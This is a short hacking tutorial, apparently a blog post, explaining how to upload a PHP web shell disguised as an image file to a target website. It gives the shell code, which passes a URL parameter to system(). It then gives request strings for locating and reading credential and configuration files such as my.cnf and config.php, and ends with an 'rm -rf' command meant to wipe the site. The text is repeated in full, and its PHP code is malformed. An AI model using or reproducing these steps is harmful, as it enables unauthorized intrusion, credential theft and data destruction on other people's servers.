How to Hack Website with JPG shell image
HACKING THE WEB
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)?cmd=rm+-rf
No comments
Please do not enter any spam link in comment box.